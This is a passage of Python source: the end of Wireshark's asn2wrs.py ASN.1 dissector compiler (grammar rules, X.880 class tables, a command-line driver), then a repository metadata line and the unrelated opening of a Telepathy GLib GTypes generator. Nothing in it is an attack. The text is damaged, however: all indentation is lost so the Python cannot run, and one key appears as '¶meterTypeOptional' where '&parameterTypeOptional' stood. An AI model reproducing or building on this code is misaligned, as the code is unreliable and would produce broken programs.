'''FixedTypeValueFieldSpec : lcasefieldreference Type
| lcasefieldreference Type UNIQUE
| lcasefieldreference Type ValueOptionalitySpec
| lcasefieldreference Type UNIQUE ValueOptionalitySpec '''
t[0] = FixedTypeValueFieldSpec(typ = t[2])
t[0].SetName(t[1])
def p_ValueOptionalitySpec_1 (t):
'ValueOptionalitySpec ::= OPTIONAL'
pass
def p_ValueOptionalitySpec_2 (t):
'ValueOptionalitySpec ::= DEFAULT Value'
pass
# 9.8
def p_VariableTypeValueFieldSpec (t):
'''VariableTypeValueFieldSpec : lcasefieldreference FieldName
| lcasefieldreference FieldName ValueOptionalitySpec '''
t[0] = VariableTypeValueFieldSpec()
t[0].SetName(t[1])
# 9.9
def p_FixedTypeValueSetFieldSpec (t):
'''FixedTypeValueSetFieldSpec : ucasefieldreference Type
| ucasefieldreference Type ValueSetOptionalitySpec '''
t[0] = FixedTypeValueSetFieldSpec()
t[0].SetName(t[1])
def p_ValueSetOptionalitySpec_1 (t):
'ValueSetOptionalitySpec ::= OPTIONAL'
pass
def p_ValueSetOptionalitySpec_2 (t):
'ValueSetOptionalitySpec ::= DEFAULT ValueSet'
pass
# 9.11
def p_ObjectFieldSpec (t):
'''ObjectFieldSpec : lcasefieldreference DefinedObjectClass
| lcasefieldreference DefinedObjectClass ObjectOptionalitySpec '''
t[0] = ObjectFieldSpec(cls=t[2])
t[0].SetName(t[1])
global obj_class
obj_class = None
def p_ObjectOptionalitySpec_1 (t):
'ObjectOptionalitySpec ::= OPTIONAL'
pass
def p_ObjectOptionalitySpec_2 (t):
'ObjectOptionalitySpec ::= DEFAULT Object'
pass
# 9.12
def p_ObjectSetFieldSpec (t):
'''ObjectSetFieldSpec : ucasefieldreference DefinedObjectClass
| ucasefieldreference DefinedObjectClass ObjectSetOptionalitySpec '''
t[0] = ObjectSetFieldSpec(cls=t[2])
t[0].SetName(t[1])
def p_ObjectSetOptionalitySpec_1 (t):
'ObjectSetOptionalitySpec ::= OPTIONAL'
pass
def p_ObjectSetOptionalitySpec_2 (t):
'ObjectSetOptionalitySpec ::= DEFAULT ObjectSet'
pass
# 9.13
def p_PrimitiveFieldName (t):
'''PrimitiveFieldName : ucasefieldreference
| lcasefieldreference '''
t[0] = t[1]
# 9.13
def p_FieldName_1 (t):
'FieldName : PrimitiveFieldName'
t[0] = t[1]
def p_FieldName_2 (t):
'FieldName : FieldName DOT PrimitiveFieldName'
t[0] = t[1] + '.' + t[3]
# 11 Information object definition and assignment
# 11.1
def p_ObjectAssignment (t):
'ObjectAssignment : objectreference DefinedObjectClass ASSIGNMENT Object'
t[0] = ObjectAssignment (ident = t[1], cls=t[2].val, val=t[4])
global obj_class
obj_class = None
# 11.3
def p_Object (t):
'''Object : DefinedObject
| ObjectDefn
| ParameterizedObject'''
t[0] = t[1]
# 11.4
def p_ObjectDefn (t):
'ObjectDefn : lbraceobject bodyobject rbraceobject'
t[0] = t[2]
# {...} block of object definition
def p_lbraceobject(t):
'lbraceobject : braceobjectbegin LBRACE'
t[0] = t[1]
def p_braceobjectbegin(t):
'braceobjectbegin : '
global lexer
global obj_class
if set_class_syntax(obj_class):
state = 'INITIAL'
else:
lexer.level = 1
state = 'braceignore'
lexer.push_state(state)
def p_rbraceobject(t):
'rbraceobject : braceobjectend RBRACE'
t[0] = t[2]
def p_braceobjectend(t):
'braceobjectend : '
global lexer
lexer.pop_state()
set_class_syntax(None)
def p_bodyobject_1 (t):
'bodyobject : '
t[0] = { }
def p_bodyobject_2 (t):
'bodyobject : cls_syntax_list'
t[0] = t[1]
def p_cls_syntax_list_1 (t):
'cls_syntax_list : cls_syntax_list cls_syntax'
t[0] = t[1]
t[0].update(t[2])
def p_cls_syntax_list_2 (t):
'cls_syntax_list : cls_syntax'
t[0] = t[1]
# X.681
def p_cls_syntax_1 (t):
'cls_syntax : Type IDENTIFIED BY Value'
t[0] = { get_class_fieled(' ') : t[1], get_class_fieled(' '.join((t[2], t[3]))) : t[4] }
def p_cls_syntax_2 (t):
'cls_syntax : HAS PROPERTY Value'
t[0] = { get_class_fieled(' '.join(t[1:-1])) : t[-1:][0] }
# X.880
def p_cls_syntax_3 (t):
'''cls_syntax : ERRORS ObjectSet
| LINKED ObjectSet
| RETURN RESULT BooleanValue
| SYNCHRONOUS BooleanValue
| INVOKE PRIORITY Value
| RESULT_PRIORITY Value
| PRIORITY Value
| ALWAYS RESPONDS BooleanValue
| IDEMPOTENT BooleanValue '''
t[0] = { get_class_fieled(' '.join(t[1:-1])) : t[-1:][0] }
def p_cls_syntax_4 (t):
'''cls_syntax : ARGUMENT Type
| RESULT Type
| PARAMETER Type '''
t[0] = { get_class_fieled(t[1]) : t[2] }
def p_cls_syntax_5 (t):
'cls_syntax : CODE Value'
fld = get_class_fieled(t[1]);
t[0] = { fld : t[2] }
if isinstance(t[2], ChoiceValue):
fldt = fld + '.' + t[2].choice
t[0][fldt] = t[2]
def p_cls_syntax_6 (t):
'''cls_syntax : ARGUMENT Type OPTIONAL BooleanValue
| RESULT Type OPTIONAL BooleanValue
| PARAMETER Type OPTIONAL BooleanValue '''
t[0] = { get_class_fieled(t[1]) : t[2], get_class_fieled(' '.join((t[1], t[3]))) : t[4] }
# 12 Information object set definition and assignment
# 12.1
def p_ObjectSetAssignment (t):
'ObjectSetAssignment : UCASE_IDENT CLASS_IDENT ASSIGNMENT ObjectSet'
t[0] = Node('ObjectSetAssignment', name=t[1], cls=t[2], val=t[4])
# 12.3
def p_ObjectSet (t):
'ObjectSet : lbraceignore rbraceignore'
t[0] = None
# 14 Notation for the object class field type ---------------------------------
# 14.1
def p_ObjectClassFieldType (t):
'ObjectClassFieldType : DefinedObjectClass DOT FieldName'
t[0] = get_type_from_class(t[1], t[3])
# 14.6
def p_ObjectClassFieldValue (t):
'''ObjectClassFieldValue : OpenTypeFieldVal'''
t[0] = t[1]
def p_OpenTypeFieldVal (t):
'''OpenTypeFieldVal : Type COLON Value
| NullType COLON NullValue'''
t[0] = t[3]
# 15 Information from objects -------------------------------------------------
# 15.1
def p_ValueFromObject (t):
'ValueFromObject : LCASE_IDENT DOT FieldName'
t[0] = t[1] + '.' + t[3]
# Annex C - The instance-of type ----------------------------------------------
# C.2
def p_InstanceOfType (t):
'InstanceOfType : INSTANCE OF DefinedObjectClass'
t[0] = InstanceOfType()
# --- tables ---
useful_object_class_types = {
# Annex A
'TYPE-IDENTIFIER.&id' : lambda : ObjectIdentifierType(),
'TYPE-IDENTIFIER.&Type' : lambda : OpenType(),
# Annex B
'ABSTRACT-SYNTAX.&id' : lambda : ObjectIdentifierType(),
'ABSTRACT-SYNTAX.&Type' : lambda : OpenType(),
'ABSTRACT-SYNTAX.&property' : lambda : BitStringType(),
}
object_class_types = { }
object_class_typerefs = { }
object_class_classrefs = { }
# dummy types
class _VariableTypeValueFieldSpec (AnyType):
pass
class _FixedTypeValueSetFieldSpec (AnyType):
pass
class_types_creator = {
'BooleanType' : lambda : BooleanType(),
'IntegerType' : lambda : IntegerType(),
'ObjectIdentifierType' : lambda : ObjectIdentifierType(),
'OpenType' : lambda : OpenType(),
# dummy types
'_VariableTypeValueFieldSpec' : lambda : _VariableTypeValueFieldSpec(),
'_FixedTypeValueSetFieldSpec' : lambda : _FixedTypeValueSetFieldSpec(),
}
class_names = { }
x681_syntaxes = {
'TYPE-IDENTIFIER' : {
' ' : '&Type',
'IDENTIFIED' : 'IDENTIFIED',
#'BY' : 'BY',
'IDENTIFIED BY' : '&id',
},
'ABSTRACT-SYNTAX' : {
' ' : '&Type',
'IDENTIFIED' : 'IDENTIFIED',
#'BY' : 'BY',
'IDENTIFIED BY' : '&id',
'HAS' : 'HAS',
'PROPERTY' : 'PROPERTY',
'HAS PROPERTY' : '&property',
},
}
class_syntaxes_enabled = {
'TYPE-IDENTIFIER' : True,
'ABSTRACT-SYNTAX' : True,
}
class_syntaxes = {
'TYPE-IDENTIFIER' : x681_syntaxes['TYPE-IDENTIFIER'],
'ABSTRACT-SYNTAX' : x681_syntaxes['ABSTRACT-SYNTAX'],
}
class_current_syntax = None
def get_syntax_tokens(syntaxes):
tokens = { }
for s in (syntaxes):
for k in (list(syntaxes[s].keys())):
if k.find(' ') < 0:
tokens[k] = k
tokens[k] = tokens[k].replace('-', '_')
return list(tokens.values())
tokens = tokens + get_syntax_tokens(x681_syntaxes)
def set_class_syntax(syntax):
global class_syntaxes_enabled
global class_current_syntax
#print "set_class_syntax", syntax, class_current_syntax
if class_syntaxes_enabled.get(syntax, False):
class_current_syntax = syntax
return True
else:
class_current_syntax = None
return False
def is_class_syntax(name):
global class_syntaxes
global class_current_syntax
#print "is_class_syntax", name, class_current_syntax
if not class_current_syntax:
return False
return name in class_syntaxes[class_current_syntax]
def get_class_fieled(name):
if not class_current_syntax:
return None
return class_syntaxes[class_current_syntax][name]
def is_class_ident(name):
return name in class_names
def add_class_ident(name):
#print "add_class_ident", name
class_names[name] = name
def get_type_from_class(cls, fld):
flds = fld.split('.')
if (isinstance(cls, Class_Ref)):
key = cls.val + '.' + flds[0]
else:
key = cls + '.' + flds[0]
if key in object_class_classrefs:
return get_type_from_class(object_class_classrefs[key], '.'.join(flds[1:]))
if key in object_class_typerefs:
return Type_Ref(val=object_class_typerefs[key])
creator = lambda : AnyType()
creator = useful_object_class_types.get(key, creator)
creator = object_class_types.get(key, creator)
return creator()
def set_type_to_class(cls, fld, pars):
#print "set_type_to_class", cls, fld, pars
key = cls + '.' + fld
typename = 'OpenType'
if (len(pars) > 0):
typename = pars[0]
else:
pars.append(typename)
typeref = None
if (len(pars) > 1):
if (isinstance(pars[1], Class_Ref)):
pars[1] = pars[1].val
typeref = pars[1]
msg = None
if key in object_class_types:
msg = object_class_types[key]().type
if key in object_class_typerefs:
msg = "TypeReference " + object_class_typerefs[key]
if key in object_class_classrefs:
msg = "ClassReference " + object_class_classrefs[key]
if msg == ' '.join(pars):
msg = None
if msg:
msg0 = "Can not define CLASS field %s as '%s'\n" % (key, ' '.join(pars))
msg1 = "Already defined as '%s'" % (msg)
raise CompError(msg0 + msg1)
if (typename == 'ClassReference'):
if not typeref: return False
object_class_classrefs[key] = typeref
return True
if (typename == 'TypeReference'):
if not typeref: return False
object_class_typerefs[key] = typeref
return True
creator = class_types_creator.get(typename)
if creator:
object_class_types[key] = creator
return True
else:
return False
def import_class_from_module(mod, cls):
add_class_ident(cls)
mcls = "$%s$%s" % (mod, cls)
for k in list(object_class_classrefs.keys()):
kk = k.split('.', 1)
if kk[0] == mcls:
object_class_classrefs[cls + '.' + kk[0]] = object_class_classrefs[k]
for k in list(object_class_typerefs.keys()):
kk = k.split('.', 1)
if kk[0] == mcls:
object_class_typerefs[cls + '.' + kk[0]] = object_class_typerefs[k]
for k in list(object_class_types.keys()):
kk = k.split('.', 1)
if kk[0] == mcls:
object_class_types[cls + '.' + kk[0]] = object_class_types[k]
#--- ITU-T Recommendation X.682 -----------------------------------------------
# 8 General constraint specification ------------------------------------------
# 8.1
def p_GeneralConstraint (t):
'''GeneralConstraint : UserDefinedConstraint
| TableConstraint
| ContentsConstraint'''
t[0] = t[1]
# 9 User-defined constraints --------------------------------------------------
# 9.1
def p_UserDefinedConstraint (t):
'UserDefinedConstraint : CONSTRAINED BY LBRACE UserDefinedConstraintParameterList RBRACE'
t[0] = Constraint(type = 'UserDefined', subtype = t[4])
def p_UserDefinedConstraintParameterList_1 (t):
'UserDefinedConstraintParameterList : '
t[0] = []
def p_UserDefinedConstraintParameterList_2 (t):
'UserDefinedConstraintParameterList : UserDefinedConstraintParameter'
t[0] = [t[1]]
def p_UserDefinedConstraintParameterList_3 (t):
'UserDefinedConstraintParameterList : UserDefinedConstraintParameterList COMMA UserDefinedConstraintParameter'
t[0] = t[1] + [t[3]]
# 9.3
def p_UserDefinedConstraintParameter (t):
'UserDefinedConstraintParameter : Type'
t[0] = t[1]
# 10 Table constraints, including component relation constraints --------------
# 10.3
def p_TableConstraint (t):
'''TableConstraint : SimpleTableConstraint
| ComponentRelationConstraint'''
t[0] = Constraint(type = 'Table', subtype = t[1])
def p_SimpleTableConstraint (t):
'SimpleTableConstraint : LBRACE UCASE_IDENT RBRACE'
t[0] = t[2]
# 10.7
def p_ComponentRelationConstraint (t):
'ComponentRelationConstraint : LBRACE UCASE_IDENT RBRACE LBRACE AtNotations RBRACE'
t[0] = t[2] + str(t[5])
def p_AtNotations_1 (t):
'AtNotations : AtNotation'
t[0] = [t[1]]
def p_AtNotations_2 (t):
'AtNotations : AtNotations COMMA AtNotation'
t[0] = t[1] + [t[3]]
def p_AtNotation_1 (t):
'AtNotation : AT ComponentIdList'
t[0] = '@' + t[2]
def p_AtNotation_2 (t):
'AtNotation : AT DOT Level ComponentIdList'
t[0] = '@.' + t[3] + t[4]
def p_Level_1 (t):
'Level : DOT Level'
t[0] = '.' + t[2]
def p_Level_2 (t):
'Level : '
t[0] = ''
def p_ComponentIdList_1 (t):
'ComponentIdList : LCASE_IDENT'
t[0] = t[1]
def p_ComponentIdList_2 (t):
'ComponentIdList : ComponentIdList DOT LCASE_IDENT'
t[0] = t[1] + '.' + t[3]
# 11 Contents constraints -----------------------------------------------------
# 11.1
def p_ContentsConstraint (t):
'ContentsConstraint : CONTAINING type_ref'
t[0] = Constraint(type = 'Contents', subtype = t[2])
#--- ITU-T Recommendation X.683 -----------------------------------------------
# 8 Parameterized assignments -------------------------------------------------
# 8.1
def p_ParameterizedAssignment (t):
'''ParameterizedAssignment : ParameterizedTypeAssignment
| ParameterizedObjectClassAssignment
| ParameterizedObjectAssignment
| ParameterizedObjectSetAssignment'''
t[0] = t[1]
# 8.2
def p_ParameterizedTypeAssignment (t):
'ParameterizedTypeAssignment : UCASE_IDENT ParameterList ASSIGNMENT Type'
t[0] = t[4]
t[0].SetName(t[1]) # t[0].SetName(t[1] + 'xxx')
def p_ParameterizedObjectClassAssignment (t):
'''ParameterizedObjectClassAssignment : CLASS_IDENT ParameterList ASSIGNMENT ObjectClass
| UCASE_IDENT ParameterList ASSIGNMENT ObjectClass'''
t[0] = t[4]
t[0].SetName(t[1])
if isinstance(t[0], ObjectClassDefn):
t[0].reg_types()
def p_ParameterizedObjectAssignment (t):
'ParameterizedObjectAssignment : objectreference ParameterList DefinedObjectClass ASSIGNMENT Object'
t[0] = ObjectAssignment (ident = t[1], cls=t[3].val, val=t[5])
global obj_class
obj_class = None
def p_ParameterizedObjectSetAssignment (t):
'ParameterizedObjectSetAssignment : UCASE_IDENT ParameterList DefinedObjectClass ASSIGNMENT ObjectSet'
t[0] = Node('ObjectSetAssignment', name=t[1], cls=t[3].val, val=t[5])
# 8.3
def p_ParameterList (t):
'ParameterList : lbraceignore rbraceignore'
#def p_ParameterList (t):
# 'ParameterList : LBRACE Parameters RBRACE'
# t[0] = t[2]
#def p_Parameters_1 (t):
# 'Parameters : Parameter'
# t[0] = [t[1]]
#def p_Parameters_2 (t):
# 'Parameters : Parameters COMMA Parameter'
# t[0] = t[1] + [t[3]]
#def p_Parameter_1 (t):
# 'Parameter : Type COLON Reference'
# t[0] = [t[1], t[3]]
#def p_Parameter_2 (t):
# 'Parameter : Reference'
# t[0] = t[1]
# 9 Referencing parameterized definitions -------------------------------------
# 9.1
def p_ParameterizedReference (t):
'ParameterizedReference : Reference LBRACE RBRACE'
t[0] = t[1]
#t[0].val += 'xxx'
# 9.2
def p_ParameterizedType (t):
'ParameterizedType : type_ref ActualParameterList'
t[0] = t[1]
#t[0].val += 'xxx'
def p_ParameterizedObjectClass (t):
'ParameterizedObjectClass : DefinedObjectClass ActualParameterList'
t[0] = t[1]
#t[0].val += 'xxx'
def p_ParameterizedObject (t):
'ParameterizedObject : DefinedObject ActualParameterList'
t[0] = t[1]
#t[0].val += 'xxx'
# 9.5
def p_ActualParameterList (t):
'ActualParameterList : lbraceignore rbraceignore'
#def p_ActualParameterList (t):
# 'ActualParameterList : LBRACE ActualParameters RBRACE'
# t[0] = t[2]
#def p_ActualParameters_1 (t):
# 'ActualParameters : ActualParameter'
# t[0] = [t[1]]
#def p_ActualParameters_2 (t):
# 'ActualParameters : ActualParameters COMMA ActualParameter'
# t[0] = t[1] + [t[3]]
#def p_ActualParameter (t):
# '''ActualParameter : Type
# | Value'''
# t[0] = t[1]
#--- ITU-T Recommendation X.880 -----------------------------------------------
x880_classes = {
'OPERATION' : {
'&ArgumentType' : [],
'&argumentTypeOptional' : [ 'BooleanType' ],
'&returnResult' : [ 'BooleanType' ],
'&ResultType' : [],
'&resultTypeOptional' : [ 'BooleanType' ],
'&Errors' : [ 'ClassReference', 'ERROR' ],
'&Linked' : [ 'ClassReference', 'OPERATION' ],
'&synchronous' : [ 'BooleanType' ],
'&idempotent' : [ 'BooleanType' ],
'&alwaysReturns' : [ 'BooleanType' ],
'&InvokePriority' : [ '_FixedTypeValueSetFieldSpec' ],
'&ResultPriority' : [ '_FixedTypeValueSetFieldSpec' ],
'&operationCode' : [ 'TypeReference', 'Code' ],
},
'ERROR' : {
'&ParameterType' : [],
'¶meterTypeOptional' : [ 'BooleanType' ],
'&ErrorPriority' : [ '_FixedTypeValueSetFieldSpec' ],
'&errorCode' : [ 'TypeReference', 'Code' ],
},
'OPERATION-PACKAGE' : {
'&Both' : [ 'ClassReference', 'OPERATION' ],
'&Consumer' : [ 'ClassReference', 'OPERATION' ],
'&Supplier' : [ 'ClassReference', 'OPERATION' ],
'&id' : [ 'ObjectIdentifierType' ],
},
'CONNECTION-PACKAGE' : {
'&bind' : [ 'ClassReference', 'OPERATION' ],
'&unbind' : [ 'ClassReference', 'OPERATION' ],
'&responderCanUnbind' : [ 'BooleanType' ],
'&unbindCanFail' : [ 'BooleanType' ],
'&id' : [ 'ObjectIdentifierType' ],
},
'CONTRACT' : {
'&connection' : [ 'ClassReference', 'CONNECTION-PACKAGE' ],
'&OperationsOf' : [ 'ClassReference', 'OPERATION-PACKAGE' ],
'&InitiatorConsumerOf' : [ 'ClassReference', 'OPERATION-PACKAGE' ],
'&InitiatorSupplierOf' : [ 'ClassReference', 'OPERATION-PACKAGE' ],
'&id' : [ 'ObjectIdentifierType' ],
},
'ROS-OBJECT-CLASS' : {
'&Is' : [ 'ClassReference', 'ROS-OBJECT-CLASS' ],
'&Initiates' : [ 'ClassReference', 'CONTRACT' ],
'&Responds' : [ 'ClassReference', 'CONTRACT' ],
'&InitiatesAndResponds' : [ 'ClassReference', 'CONTRACT' ],
'&id' : [ 'ObjectIdentifierType' ],
},
}
x880_syntaxes = {
'OPERATION' : {
'ARGUMENT' : '&ArgumentType',
'ARGUMENT OPTIONAL' : '&argumentTypeOptional',
'RESULT' : '&ResultType',
'RESULT OPTIONAL' : '&resultTypeOptional',
'RETURN' : 'RETURN',
'RETURN RESULT' : '&returnResult',
'ERRORS' : '&Errors',
'LINKED' : '&Linked',
'SYNCHRONOUS' : '&synchronous',
'IDEMPOTENT' : '&idempotent',
'ALWAYS' : 'ALWAYS',
'RESPONDS' : 'RESPONDS',
'ALWAYS RESPONDS' : '&alwaysReturns',
'INVOKE' : 'INVOKE',
'PRIORITY' : 'PRIORITY',
'INVOKE PRIORITY' : '&InvokePriority',
'RESULT-PRIORITY': '&ResultPriority',
'CODE' : '&operationCode',
},
'ERROR' : {
'PARAMETER' : '&ParameterType',
'PARAMETER OPTIONAL' : '¶meterTypeOptional',
'PRIORITY' : '&ErrorPriority',
'CODE' : '&errorCode',
},
# 'OPERATION-PACKAGE' : {
# },
# 'CONNECTION-PACKAGE' : {
# },
# 'CONTRACT' : {
# },
# 'ROS-OBJECT-CLASS' : {
# },
}
def x880_module_begin():
#print "x880_module_begin()"
for name in list(x880_classes.keys()):
add_class_ident(name)
def x880_import(name):
if name in x880_syntaxes:
class_syntaxes_enabled[name] = True
class_syntaxes[name] = x880_syntaxes[name]
if name in x880_classes:
add_class_ident(name)
for f in (list(x880_classes[name].keys())):
set_type_to_class(name, f, x880_classes[name][f])
tokens = tokens + get_syntax_tokens(x880_syntaxes)
# {...} OID value
#def p_lbrace_oid(t):
# 'lbrace_oid : brace_oid_begin LBRACE'
# t[0] = t[1]
#def p_brace_oid_begin(t):
# 'brace_oid_begin : '
# global in_oid
# in_oid = True
#def p_rbrace_oid(t):
# 'rbrace_oid : brace_oid_end RBRACE'
# t[0] = t[2]
#def p_brace_oid_end(t):
# 'brace_oid_end : '
# global in_oid
# in_oid = False
# {...} block to be ignored
def p_lbraceignore(t):
'lbraceignore : braceignorebegin LBRACE'
t[0] = t[1]
def p_braceignorebegin(t):
'braceignorebegin : '
global lexer
lexer.level = 1
lexer.push_state('braceignore')
def p_rbraceignore(t):
'rbraceignore : braceignoreend RBRACE'
t[0] = t[2]
def p_braceignoreend(t):
'braceignoreend : '
global lexer
lexer.pop_state()
def p_error(t):
global input_file
raise ParseError(t, input_file)
def p_pyquote (t):
'''pyquote : PYQUOTE'''
t[0] = PyQuote (val = t[1])
def testlex (s):
lexer.input (s)
while True:
token = lexer.token ()
if not token:
break
print(token)
def do_module (ast, defined_dict):
assert (ast.type == 'Module')
ctx = Ctx (defined_dict)
print(ast.to_python (ctx))
print(ctx.output_assignments ())
print(ctx.output_pyquotes ())
def eth_do_module (ast, ectx):
assert (ast.type == 'Module')
if ectx.dbg('s'): print(ast.str_depth(0))
ast.to_eth(ectx)
def testyacc(s, fn, defined_dict):
ast = yacc.parse(s, debug=0)
time_str = time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime())
print("""#!/usr/bin/env python
# Auto-generated from %s at %s
from PyZ3950 import asn1""" % (fn, time_str))
for module in ast:
eth_do_module (module, defined_dict)
# Wireshark compiler
def eth_usage():
print("""
asn2wrs [-h|?] [-d dbg] [-b] [-p proto] [-c cnf_file] [-e] input_file(s) ...
-h|? : Usage
-b : BER (default is PER)
-u : Unaligned (default is aligned)
-p proto : Protocol name (implies -S). Default is module-name
from input_file (renamed by #.MODULE if present)
-o name : Output files name core (default is <proto>)
-O dir : Output directory for dissector
-c cnf_file : Conformance file
-I path : Path for conformance file includes
-e : Create conformance file for exported types
-E : Just create conformance file for exported types
-S : Single output for multiple modules
-s template : Single file output (template is input file
without .c/.h extension)
-k : Keep intermediate files though single file output is used
-L : Suppress #line directive from .cnf file
-D dir : Directory for input_file(s) (default: '.')
-C : Add check for SIZE constraints
-r prefix : Remove the prefix from type names
input_file(s) : Input ASN.1 file(s)
-d dbg : Debug output, dbg = [l][y][p][s][a][t][c][m][o]
l - lex
y - yacc
p - parsing
s - internal ASN.1 structure
a - list of assignments
t - tables
c - conformance values
m - list of compiled modules with dependency
o - list of output files
""")
def eth_main():
global input_file
global g_conform
global lexer
print("ASN.1 to Wireshark dissector compiler");
try:
opts, args = getopt.getopt(sys.argv[1:], "h?d:D:buXp:FTo:O:c:I:eESs:kLCr:");
except getopt.GetoptError:
eth_usage(); sys.exit(2)
if len(args) < 1:
eth_usage(); sys.exit(2)
conform = EthCnf()
conf_to_read = None
output = EthOut()
ectx = EthCtx(conform, output)
ectx.encoding = 'per'
ectx.proto_opt = None
ectx.fld_opt = {}
ectx.tag_opt = False
ectx.outnm_opt = None
ectx.aligned = True
ectx.dbgopt = ''
ectx.new = True
ectx.expcnf = False
ectx.justexpcnf = False
ectx.merge_modules = False
ectx.group_by_prot = False
ectx.conform.last_group = 0
ectx.conform.suppress_line = False;
ectx.output.outnm = None
ectx.output.single_file = None
ectx.constraints_check = False;
for o, a in opts:
if o in ("-h", "-?"):
eth_usage(); sys.exit(2)
if o in ("-c",):
conf_to_read = a
if o in ("-I",):
ectx.conform.include_path.append(a)
if o in ("-E",):
ectx.expcnf = True
ectx.justexpcnf = True
if o in ("-D",):
ectx.srcdir = a
if o in ("-C",):
ectx.constraints_check = True
if o in ("-X",):
warnings.warn("Command line option -X is obsolete and can be removed")
if o in ("-T",):
warnings.warn("Command line option -T is obsolete and can be removed")
if conf_to_read:
ectx.conform.read(conf_to_read)
for o, a in opts:
if o in ("-h", "-?", "-c", "-I", "-E", "-D", "-C", "-X", "-T"):
pass # already processed
else:
par = []
if a: par.append(a)
ectx.conform.set_opt(o, par, "commandline", 0)
(ld, yd, pd) = (0, 0, 0);
if ectx.dbg('l'): ld = 1
if ectx.dbg('y'): yd = 1
if ectx.dbg('p'): pd = 2
lexer = lex.lex(debug=ld)
yacc.yacc(method='LALR', debug=yd)
g_conform = ectx.conform
ast = []
for fn in args:
input_file = fn
lexer.lineno = 1
if (ectx.srcdir): fn = ectx.srcdir + '/' + fn
# Read ASN.1 definition, trying one of the common encodings.
data = open(fn, "rb").read()
for encoding in ('utf-8', 'windows-1252'):
try:
data = data.decode(encoding)
break
except:
warnings.warn_explicit("Decoding %s as %s failed, trying next." % (fn, encoding), UserWarning, '', 0)
# Py2 compat, name.translate in eth_output_hf_arr fails with unicode
if not isinstance(data, str):
data = data.encode('utf-8')
ast.extend(yacc.parse(data, lexer=lexer, debug=pd))
ectx.eth_clean()
if (ectx.merge_modules): # common output for all module
ectx.eth_clean()
for module in ast:
eth_do_module(module, ectx)
ectx.eth_prepare()
ectx.eth_do_output()
elif (ectx.groups()): # group by protocols/group
groups = []
pr2gr = {}
if (ectx.group_by_prot): # group by protocols
for module in ast:
prot = module.get_proto(ectx)
if prot not in pr2gr:
pr2gr[prot] = len(groups)
groups.append([])
groups[pr2gr[prot]].append(module)
else: # group by groups
pass
for gm in (groups):
ectx.eth_clean()
for module in gm:
eth_do_module(module, ectx)
ectx.eth_prepare()
ectx.eth_do_output()
else: # output for each module
for module in ast:
ectx.eth_clean()
eth_do_module(module, ectx)
ectx.eth_prepare()
ectx.eth_do_output()
if ectx.dbg('m'):
ectx.dbg_modules()
if ectx.dbg('c'):
ectx.conform.dbg_print()
if not ectx.justexpcnf:
ectx.conform.unused_report()
if ectx.dbg('o'):
ectx.output.dbg_print()
ectx.output.make_single_file()
# Python compiler
def main():
testfn = testyacc
if len (sys.argv) == 1:
while True:
s = input ('Query: ')
if len (s) == 0:
break
testfn (s, 'console', {})
else:
defined_dict = {}
for fn in sys.argv [1:]:
f = open (fn, "r")
testfn (f.read (), fn, defined_dict)
f.close ()
lexer.lineno = 1
#--- BODY ---------------------------------------------------------------------
if __name__ == '__main__':
if (os.path.splitext(os.path.basename(sys.argv[0]))[0].lower() in ('asn2wrs', 'asn2eth')):
eth_main()
else:
main()
#------------------------------------------------------------------------------
#
# Editor modelines - http://www.wireshark.org/tools/modelines.html
#
# c-basic-offset: 4; tab-width: 8; indent-tabs-mode: nil
# vi: set shiftwidth=4 tabstop=8 expandtab:
# :indentSize=4:tabSize=8:noTabs=true:
| weinrank/wireshark | tools/asn2wrs.py | Python | gpl-2.0 | 308,942 |
#!/usr/bin/python
# Generate GLib GInterfaces from the Telepathy specification.
# The master copy of this program is in the telepathy-glib repository -
# please make any changes there.
#
# Copyright (C) 2006, 2007 Collabora Limited
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import sys
import xml.dom.minidom
from libglibcodegen import escape_as_identifier, \
get_docstring, \
NS_TP, \
Signature, \
type_to_gtype, \
xml_escape
def types_to_gtypes(types):
return [type_to_gtype(t)[1] for t in types]
class GTypesGenerator(object):
def __init__(self, dom, output, mixed_case_prefix):
self.dom = dom
self.Prefix = mixed_case_prefix
self.PREFIX_ = self.Prefix.upper() + '_'
self.prefix_ = self.Prefix.lower() + '_'
self.header = open(output + '.h', 'w')
self.body = open(output + '-body.h', 'w')
self.docs = open(output + '-gtk-doc.h', 'w')
for f in (self.header, self.body, self.docs):
f.write('/* Auto-generated, do not edit.\n *\n'
' * This file may be distributed under the same terms\n'
' * as the specification from which it was generated.\n'
' */\n\n')
# keys are e.g. 'sv', values are the key escaped
self.need_mappings = {}
# keys are the contents of the struct (e.g. 'sssu'), values are the
# key escaped
self.need_structs = {}
# keys are the contents of the struct (e.g. 'sssu'), values are the
# key escaped
self.need_struct_arrays = {}
# keys are the contents of the array (unlike need_struct_arrays!),
# values are the key escaped
self.need_other_arrays = {}
def h(self, code):
self.header.write(code.encode("utf-8"))
def c(self, code):
self.body.write(code.encode("utf-8"))
def d(self, code):
self.docs.write(code.encode('utf-8'))
def do_mapping_header(self, mapping):
members = mapping.getElementsByTagNameNS(NS_TP, 'member')
assert len(members) == 2
impl_sig = ''.join([elt.getAttribute('type')
for elt in members])
esc_impl_sig = escape_as_identifier(impl_sig)
name = (self.PREFIX_ + 'HASH_TYPE_' +
mapping.getAttribute('name').upper())
impl = self.prefix_ + 'type_dbus_hash_' + esc_impl_sig
docstring = get_docstring(mapping) or '(Undocumented)'
self.d('/**\n * %s:\n *\n' % name)
self.d(' * %s\n' % xml_escape(docstring))
self.d(' *\n')
self.d(' * This macro expands to a call to a function\n')
self.d(' * that returns the #GType of a #GHashTable\n')
self.d(' * appropriate for representing a D-Bus\n')
self.d(' * dictionary of signature\n')
self.d(' * <literal>a{%s}</literal>.\n' % impl_sig)
self.d(' *\n')
key, value = members
self.d(' * Keys (D-Bus type <literal>%s</literal>,\n'
% key.getAttribute('type'))
tp_type = key.getAttributeNS(NS_TP, 'type')
if tp_type:
self.d(' * type <literal>%s</literal>,\n' % tp_type)
self.d(' * named <literal>%s</literal>):\n'
% key.getAttribute('name'))
docstring = get_docstring(key) or '(Undocumented)'
self.d(' * %s\n' % xml_escape(docstring))
self.d(' *\n')
